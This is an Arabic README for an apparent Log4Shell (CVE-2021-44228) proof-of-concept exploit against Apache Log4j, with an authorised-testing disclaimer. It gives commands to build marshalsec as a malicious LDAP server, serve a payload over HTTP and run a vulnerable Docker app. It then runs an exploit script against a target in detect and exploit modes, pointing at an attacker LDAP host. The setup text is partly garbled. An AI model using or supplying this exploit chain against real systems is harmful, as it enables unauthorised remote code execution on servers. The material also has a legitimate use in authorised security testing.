
إثبات المفهوم لثغرة Log4Shell CVE-2021-44228
(CVE-2021-44228)
إكسبلويت اختباري للثغرة الحرجة Log4Shell في Apache Log4j ≤ 2.14.1، والذي يتيح تنفيذ كود عن بُعد عبر حقن JNDI.
⚠️ هذا الـ PoC مخصص للأغراض التعليمية والاختبارات الخاضعة للرقابة في البيئات المصرح بها فقط. لا تستخدمه ضد أي نظام دون إذن صريح.
marshalsec (لخادم LDAP الخبيث)python3 -m http.server)docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
```
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
python3 main.py -u http://target.com -i burp.collab.net -m detect
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit